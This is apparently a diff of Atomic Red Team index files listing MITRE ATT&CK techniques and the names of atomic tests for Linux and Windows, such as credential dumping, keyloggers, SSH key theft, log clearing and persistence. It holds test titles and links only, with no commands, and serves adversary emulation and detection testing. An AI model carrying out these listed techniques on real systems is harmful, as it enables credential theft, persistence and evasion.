- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1566.001 Spearphishing Attachment](../../T1566.001/T1566.001.md)
- Atomic Test #1: Download Macro-Enabled Phishing Attachment [windows]
- Atomic Test #1: Download Phishing Attachment - VBScript [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/Indexes-Markdown/linux-index.md
+345 -618
View File
@@ -1,282 +1,210 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
- Atomic Test #3: Access /etc/{shadow,passwd} with a standard bin that's not cat [linux]
- Atomic Test #4: Access /etc/{shadow,passwd} with shell builtins [linux]
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.007 Container API](../../T1552.007/T1552.007.md)
- Atomic Test #1: ListSecrets [containers]
- Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.003 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.002 GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- Atomic Test #4: SUDO brute force Debian [linux]
- Atomic Test #5: SUDO brute force Redhat [linux]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- Atomic Test #3: Capture Passwords with MimiPenguin [linux]
- [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
- Atomic Test #1: Golden SAML [azure-ad]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1115 Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213.003 Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213.001 Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.002 GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [containers]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# persistence
- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1525 Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.002 Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# credential-access
- T1003.008 /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #2: Extract passwords with grep [macos, linux]
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1555.003 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1612 Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Overwrite Linux Mail Spool [linux]
- Atomic Test #3: Overwrite Linux Log [linux]
- [T1078.004 Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
- [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
